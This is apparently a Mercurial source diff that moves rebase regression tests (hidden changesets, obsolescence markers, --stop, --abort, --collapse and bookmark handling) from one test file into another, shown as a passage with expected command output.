(--hidden, rebaseskipobsolete=0, directaccess, etc.), -rebasestate may contain hidden hashes. "rebase --abort" should work regardless. - - $ hg init $TESTTMP/hidden-state1 - $ cd $TESTTMP/hidden-state1 - $ cat >> .hg/hgrc <<EOF - > [experimental] - > rebaseskipobsolete=0 - > EOF - - $ hg debugdrawdag <<'EOS' - > C - > | - > D B # prune: B, C - > |/ # B/D=B - > A - > EOS - - $ eval `hg tags -T '{tag}={node}\n'` - $ rm .hg/localtags - - $ hg update -q $C --hidden - updated to hidden changeset 7829726be4dc - (hidden revision '7829726be4dc' is pruned) - $ hg rebase -s $B -d $D - rebasing 1:2ec65233581b "B" - merging D - warning: conflicts while merging D! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - - $ cp -R . $TESTTMP/hidden-state2 - - $ hg log -G - @ 2:b18e25de2cf5 D - | - | % 1:2ec65233581b B (pruned using prune) - |/ - o 0:426bada5c675 A - - $ hg summary - parent: 2:b18e25de2cf5 tip - D - branch: default - commit: 1 modified, 1 added, 1 unknown, 1 unresolved - update: 1 new changesets, 2 branch heads (merge) - phases: 3 draft - rebase: 0 rebased, 2 remaining (rebase --continue) - - $ hg rebase --abort - rebase aborted - -Also test --continue for the above case - - $ cd $TESTTMP/hidden-state2 - $ hg resolve -m - (no more unresolved files) - continue: hg rebase --continue - $ hg rebase --continue - rebasing 1:2ec65233581b "B" - rebasing 3:7829726be4dc tip "C" - $ hg log -G - @ 5:1964d5d5b547 C - | - o 4:68deb90c12a2 B - | - o 2:b18e25de2cf5 D - | - o 0:426bada5c675 A - -==================== -Test --stop option | -==================== - $ cd .. 
- $ hg init rbstop - $ cd rbstop - $ echo a>a - $ hg ci -Aqma - $ echo b>b - $ hg ci -Aqmb - $ echo c>c - $ hg ci -Aqmc - $ echo d>d - $ hg ci -Aqmd - $ hg up 0 -q - $ echo f>f - $ hg ci -Aqmf - $ echo D>d - $ hg ci -Aqm "conflict with d" - $ hg up 3 -q - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - 1 new orphan changesets - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 7:7fffad344617 test - | c - | - o 6:b15528633407 test - | b - | - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | x 2:177f92b77385 test - | | c - | | - | x 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test it aborts if unstable csets is not allowed: -=============================================== - $ cat >> $HGRCPATH << EOF - > [experimental] - > evolution.allowunstable=False - > EOF - - $ hg strip 6 --no-backup -q - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while 
merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - abort: cannot remove original changesets with unrebased descendants - (either enable obsmarkers to allow unstable revisions or use --keep to keep original changesets) - [255] - $ hg rebase --abort - saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg - rebase aborted - -Test --stop when --keep is passed: -================================== - $ hg rebase -s 1 -d 5 --keep - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 7:7fffad344617 test - | c - | - o 6:b15528633407 test - | b - | - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test --stop aborts when --collapse was passed: -============================================= - $ cat >> $HGRCPATH << EOF - > [experimental] - > evolution.allowunstable=True - > EOF - - $ hg strip 6 - saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 --collapse -m "collapsed b c d" - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d 
- warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - abort: cannot stop in --collapse session - [255] - $ hg rebase --abort - rebase aborted - $ hg diff - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test --stop raise errors with conflicting options: -================================================= - $ hg rebase -s 3 -d 5 - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop --dry-run - abort: cannot specify both --stop and --dry-run - [10] - - $ hg rebase -s 3 -d 5 - abort: rebase in progress - (use 'hg rebase --continue', 'hg rebase --abort', or 'hg rebase --stop') - [20] - $ hg rebase --stop --continue - abort: cannot specify both --stop and --continue - [10] - -Test --stop moves bookmarks of original revisions to new rebased nodes: -====================================================================== - $ cd .. 
- $ hg init repo - $ cd repo - - $ echo a > a - $ hg ci -Am A - adding a - - $ echo b > b - $ hg ci -Am B - adding b - $ hg book X - $ hg book Y - - $ echo c > c - $ hg ci -Am C - adding c - $ hg book Z - - $ echo d > d - $ hg ci -Am D - adding d - - $ hg up 0 -q - $ echo e > e - $ hg ci -Am E - adding e - created new head - - $ echo doubt > d - $ hg ci -Am "conflict with d" - adding d - - $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n" - @ 5: 39adf30bc1be 'conflict with d' bookmarks: - | - o 4: 9c1e55f411b6 'E' bookmarks: - | - | o 3: 67a385d4e6f2 'D' bookmarks: Z - | | - | o 2: 49cb3485fa0c 'C' bookmarks: Y - | | - | o 1: 6c81ed0049f8 'B' bookmarks: X - |/ - o 0: 1994f17a630e 'A' bookmarks: - - $ hg rebase -s 1 -d 5 - rebasing 1:6c81ed0049f8 X "B" - rebasing 2:49cb3485fa0c Y "C" - rebasing 3:67a385d4e6f2 Z "D" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - 1 new orphan changesets - $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n" - o 7: 9c86c650b686 'C' bookmarks: Y - | - o 6: 9b87b54e5fd8 'B' bookmarks: X - | - @ 5: 39adf30bc1be 'conflict with d' bookmarks: - | - o 4: 9c1e55f411b6 'E' bookmarks: - | - | * 3: 67a385d4e6f2 'D' bookmarks: Z - | | - | x 2: 49cb3485fa0c 'C' bookmarks: - | | - | x 1: 6c81ed0049f8 'B' bookmarks: - |/ - o 0: 1994f17a630e 'A' bookmarks: - diff --git a/tests/test-rebase-obsolete.t b/tests/test-rebase-obsolete2.t copy from tests/test-rebase-obsolete.t copy to tests/test-rebase-obsolete2.t --- a/tests/test-rebase-obsolete.t +++ b/tests/test-rebase-obsolete2.t @@ -18,732 +18,6 @@ > strip= > EOF -Setup rebase canonical repo - - $ hg init base - $ cd base - $ hg unbundle "$TESTDIR/bundles/rebase.hg" - adding changesets - adding manifests - adding file changes - added 8 changesets with 7 changes to 7 files (+2 heads) - new changesets cd010b8cd998:02de42196ebe (8 
drafts) - (run 'hg heads' to see heads, 'hg merge' to merge) - $ hg up tip - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg log -G - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | o 3:32af7686d403 D - | | - | o 2:5fddd98957c8 C - | | - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ cd .. - -simple rebase ---------------------------------- - - $ hg clone base simple - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd simple - $ hg up 32af7686d403 - 3 files updated, 0 files merged, 2 files removed, 0 files unresolved - $ hg rebase -d eea13746799a - rebasing 1:42ccdea3bb16 "B" - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - @ 10:8eeb3c33ad33 D - | - o 9:2327fea05063 C - | - o 8:e4e5be0395b2 B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - @ 10:8eeb3c33ad33 D - | - o 9:2327fea05063 C - | - o 8:e4e5be0395b2 B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 10:8eeb3c33ad33) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 9:2327fea05063) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 8:e4e5be0395b2) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 e4e5be0395b2cbd471ed22a26b1b6a1a0658a794 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 2327fea05063f39961b14cb69435a9898dc9a245 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 8eeb3c33ad33d452c89e5dcf611c347f978fb42b 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 
'user': 'test'} - - - $ cd .. - -empty changeset ---------------------------------- - - $ hg clone base empty - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd empty - $ hg up eea13746799a - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - -We make a copy of both the first changeset in the rebased and some other in the -set. - - $ hg graft 42ccdea3bb16 32af7686d403 - grafting 1:42ccdea3bb16 "B" - grafting 3:32af7686d403 "D" - $ hg rebase -s 42ccdea3bb16 -d . - rebasing 1:42ccdea3bb16 "B" - note: not rebasing 1:42ccdea3bb16 "B", its destination already has all its changes - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - note: not rebasing 3:32af7686d403 "D", its destination already has all its changes - $ hg log -G - o 10:5ae4c968c6ac C - | - @ 9:08483444fef9 D - | - o 8:8877864f1edb B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 10:5ae4c968c6ac C - | - @ 9:08483444fef9 D - | - o 8:8877864f1edb B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (pruned using rebase) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 10:5ae4c968c6ac) - | | - | x 1:42ccdea3bb16 B (pruned using rebase) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - - -More complex 
case where part of the rebase set were already rebased - - $ hg rebase --rev 'desc(D)' --dest 'desc(H)' - rebasing 9:08483444fef9 "D" - 1 new orphan changesets - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 08483444fef91d6224f6655ee586a65d263ad34c 4596109a6a4328c398bde3a4a3b6737cfade3003 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - $ hg log -G - @ 11:4596109a6a43 D - | - | * 10:5ae4c968c6ac C - | | - | x 9:08483444fef9 D (rewritten using rebase as 11:4596109a6a43) - | | - | o 8:8877864f1edb B - | | - o | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg rebase --source 'desc(B)' --dest 'tip' --config experimental.rebaseskipobsolete=True - rebasing 8:8877864f1edb "B" - note: not rebasing 9:08483444fef9 "D", already in destination as 11:4596109a6a43 tip "D" - rebasing 10:5ae4c968c6ac "C" - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 0 {cd010b8cd998f3981a5a8115f94f8da4ab506089} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 5ae4c968c6aca831df823664e706c9d4aa34473d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 0 {5fddd98957c8a54a4d436dfe1da9d87f21a1b97b} (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '0', 'operation': 'rebase', 'user': 'test'} - 
08483444fef91d6224f6655ee586a65d263ad34c 4596109a6a4328c398bde3a4a3b6737cfade3003 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 8877864f1edb05d0e07dc4ba77b67a80a7b86672 462a34d07e599b87ea08676a449373fe4e2e1347 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 5ae4c968c6aca831df823664e706c9d4aa34473d 98f6af4ee9539e14da4465128f894c274900b6e5 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - $ hg log --rev 'contentdivergent()' - $ hg log -G - o 13:98f6af4ee953 C - | - o 12:462a34d07e59 B - | - @ 11:4596109a6a43 D - | - o 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --style default --debug -r 4596109a6a4328c398bde3a4a3b6737cfade3003 - changeset: 11:4596109a6a4328c398bde3a4a3b6737cfade3003 - phase: draft - parent: 7:02de42196ebee42ef284b6780a87cdc96e8eaab6 - parent: -1:0000000000000000000000000000000000000000 - manifest: 11:a91006e3a02f1edf631f7018e6e5684cf27dd905 - user: Nicolas Dumazet <nicdumz.commits@gmail.com> - date: Sat Apr 30 15:24:48 2011 +0200 - files+: D - extra: branch=default - extra: rebase_source=08483444fef91d6224f6655ee586a65d263ad34c - extra: source=32af7686d403cf45b5d95f2d70cebea587ac806a - description: - D - - - $ hg up -qr 'desc(G)' - $ hg graft 4596109a6a4328c398bde3a4a3b6737cfade3003 - grafting 11:4596109a6a43 "D" - $ hg up -qr 'desc(E)' - $ hg rebase -s tip -d . 
- rebasing 14:9e36056a46e3 tip "D" - $ hg log --style default --debug -r tip - changeset: 15:627d4614809036ba22b9e7cb31638ddc06ab99ab - tag: tip - phase: draft - parent: 4:9520eea781bcca16c1e15acc0ba14335a0e8e5ba - parent: -1:0000000000000000000000000000000000000000 - manifest: 15:648e8ede73ae3e497d093d3a4c8fcc2daa864f42 - user: Nicolas Dumazet <nicdumz.commits@gmail.com> - date: Sat Apr 30 15:24:48 2011 +0200 - files+: D - extra: branch=default - extra: intermediate-source=4596109a6a4328c398bde3a4a3b6737cfade3003 - extra: rebase_source=9e36056a46e37c9776168c7375734eebc70e294f - extra: source=32af7686d403cf45b5d95f2d70cebea587ac806a - description: - D - - -Start rebase from a commit that is obsolete but not hidden only because it's -a working copy parent. We should be moved back to the starting commit as usual -even though it is hidden (until we're moved there). - - $ hg --hidden up -qr 'first(hidden())' - updated to hidden changeset 42ccdea3bb16 - (hidden revision '42ccdea3bb16' is pruned) - $ hg rebase --rev 13 --dest 15 - rebasing 13:98f6af4ee953 "C" - $ hg log -G - o 16:294a2b93eb4d C - | - o 15:627d46148090 D - | - | o 12:462a34d07e59 B - | | - | o 11:4596109a6a43 D - | | - | o 7:02de42196ebe H - | | - +---o 6:eea13746799a G - | |/ - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | @ 1:42ccdea3bb16 B (pruned using rebase) - |/ - o 0:cd010b8cd998 A - - - $ cd .. 
- -collapse rebase ---------------------------------- - - $ hg clone base collapse - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd collapse - $ hg rebase -s 42ccdea3bb16 -d eea13746799a --collapse - rebasing 1:42ccdea3bb16 "B" - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - o 8:4dc2197e807b Collapsed revision - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 8:4dc2197e807b Collapsed revision - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 8:4dc2197e807b) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 8:4dc2197e807b) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 8:4dc2197e807b) - |/ - o 0:cd010b8cd998 A - - $ hg id --debug -r tip - 4dc2197e807bae9817f09905b50ab288be2dbbcf tip - $ hg debugobsolete - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '1', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '2', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a 4dc2197e807bae9817f09905b50ab288be2dbbcf 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '13', 'fold-id': '6fb65cdc', 'fold-idx': '3', 'fold-size': '3', 'operation': 'rebase', 'user': 'test'} - - $ cd .. - -Rebase set has hidden descendants ---------------------------------- - -We rebase a changeset which has hidden descendants. Hidden changesets must not -be rebased. 
- - $ hg clone base hidden - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd hidden - $ hg log -G - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | o 3:32af7686d403 D - | | - | o 2:5fddd98957c8 C - | | - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 5fddd98957c8 -d eea13746799a - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - o 9:cf44d2f5a9f4 D - | - o 8:e273c5e7d2d2 C - | - | @ 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 42ccdea3bb16 -d 02de42196ebe - rebasing 1:42ccdea3bb16 "B" - $ hg log -G - o 10:7c6027df6a99 B - | - | o 9:cf44d2f5a9f4 D - | | - | o 8:e273c5e7d2d2 C - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - o 10:7c6027df6a99 B - | - | o 9:cf44d2f5a9f4 D - | | - | o 8:e273c5e7d2d2 C - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 9:cf44d2f5a9f4) - | | - | x 2:5fddd98957c8 C (rewritten using rebase as 8:e273c5e7d2d2) - | | - | x 1:42ccdea3bb16 B (rewritten using rebase as 10:7c6027df6a99) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b e273c5e7d2d29df783dce9f9eaa3ac4adc69c15d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a cf44d2f5a9f4297a62be94cbdd3dff7c7dc54258 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 7c6027df6a99d93f461868e5433f63bde20b6dfb 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 
'rebase', 'user': 'test'} - -Test that rewriting leaving instability behind is allowed ---------------------------------------------------------------------- - - $ hg log -r 'children(8)' - 9:cf44d2f5a9f4 D (no-eol) - $ hg rebase -r 8 - rebasing 8:e273c5e7d2d2 "C" - 1 new orphan changesets - $ hg log -G - o 11:0d8f238b634c C - | - o 10:7c6027df6a99 B - | - | * 9:cf44d2f5a9f4 D - | | - | x 8:e273c5e7d2d2 C (rewritten using rebase as 11:0d8f238b634c) - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ cd .. - $ cp -R hidden stabilize - $ cd stabilize - $ hg rebase --auto-orphans '0::' -d 10 - abort: cannot specify both --auto-orphans and --dest - [10] - $ hg rebase --auto-orphans '0::' - rebasing 9:cf44d2f5a9f4 "D" - $ hg log -G - o 12:7e3935feaa68 D - | - o 11:0d8f238b634c C - | - o 10:7c6027df6a99 B - | - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - - $ cd ../hidden - $ rm -r ../stabilize - -Test multiple root handling ------------------------------------- - - $ hg rebase --dest 4 --rev '7+11+9' - rebasing 9:cf44d2f5a9f4 "D" - rebasing 7:02de42196ebe "H" - rebasing 11:0d8f238b634c tip "C" - $ hg log -G - o 14:1e8370e38cca C - | - @ 13:bfe264faf697 H - | - | o 12:102b4c1d889b D - |/ - | * 10:7c6027df6a99 B - | | - | x 7:02de42196ebe H (rewritten using rebase as 13:bfe264faf697) - | | - +---o 6:eea13746799a G - | |/ - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ cd .. 
- -Detach both parents - - $ hg init double-detach - $ cd double-detach - - $ hg debugdrawdag <<EOF - > F - > /| - > C E - > | | - > B D G - > \|/ - > A - > EOF - - $ hg rebase -d G -r 'B + D + F' - rebasing 1:112478962961 B "B" - rebasing 2:b18e25de2cf5 D "D" - rebasing 6:f15c3adaf214 F tip "F" - abort: cannot rebase 6:f15c3adaf214 without moving at least one of its parents - [255] - - $ cd .. - -test on rebase dropping a merge - -(setup) - - $ hg init dropmerge - $ cd dropmerge - $ hg unbundle "$TESTDIR/bundles/rebase.hg" - adding changesets - adding manifests - adding file changes - added 8 changesets with 7 changes to 7 files (+2 heads) - new changesets cd010b8cd998:02de42196ebe (8 drafts) - (run 'hg heads' to see heads, 'hg merge' to merge) - $ hg up 3 - 4 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg merge 7 - 2 files updated, 0 files merged, 0 files removed, 0 files unresolved - (branch merge, don't forget to commit) - $ hg ci -m 'M' - $ echo I > I - $ hg add I - $ hg ci -m I - $ hg log -G - @ 9:4bde274eefcf I - | - o 8:53a6a128b2b7 M - |\ - | o 7:02de42196ebe H - | | - | | o 6:eea13746799a G - | |/| - | o | 5:24b6387c8c8c F - | | | - | | o 4:9520eea781bc E - | |/ - o | 3:32af7686d403 D - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - -(actual test) - - $ hg rebase --dest 6 --rev '((desc(H) + desc(D))::) - desc(M)' - rebasing 3:32af7686d403 "D" - rebasing 7:02de42196ebe "H" - rebasing 9:4bde274eefcf tip "I" - 1 new orphan changesets - $ hg log -G - @ 12:acd174b7ab39 I - | - o 11:6c11a6218c97 H - | - | o 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - -Test hidden 
changesets in the rebase set (issue4504) - - $ hg up --hidden 9 - 3 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset 4bde274eefcf - (hidden revision '4bde274eefcf' was rewritten as: acd174b7ab39) - $ echo J > J - $ hg add J - $ hg commit -m J - 1 new orphan changesets - $ hg debugobsolete `hg log --rev . -T '{node}'` - 1 new obsolescence markers - obsoleted 1 changesets - - $ hg rebase --rev .~1::. --dest 'max(desc(D))' --traceback --config experimental.rebaseskipobsolete=off - rebasing 9:4bde274eefcf "I" - rebasing 13:06edfc82198f tip "J" - 2 new content-divergent changesets - $ hg log -G - @ 15:5ae8a643467b J - | - * 14:9ad579b4a5de I - | - | * 12:acd174b7ab39 I - | | - | o 11:6c11a6218c97 H - | | - o | 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg up 14 -C - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "K" > K - $ hg add K - $ hg commit --amend -m "K" - 1 new orphan changesets - $ echo "L" > L - $ hg add L - $ hg commit -m "L" - $ hg up '.^' - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "M" > M - $ hg add M - $ hg commit --amend -m "M" - 1 new orphan changesets - $ hg log -G - @ 18:bfaedf8eb73b M - | - | * 